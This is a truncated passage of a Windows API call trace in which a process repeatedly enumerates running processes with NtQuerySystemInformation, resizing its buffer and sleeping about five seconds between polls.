RegionSize=0xdea68*=0x10000) returned 0x0 [0235.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.025] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.026] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.102] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.104] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.114] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.124] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.128] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.134] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.141] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.142] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.145] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.150] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.158] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.168] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.171] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.178] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.189] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.199] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.200] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.208] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.211] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.218] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.221] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.227] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.231] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.236] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.244] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.251] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.258] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.259] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.267] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.269] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 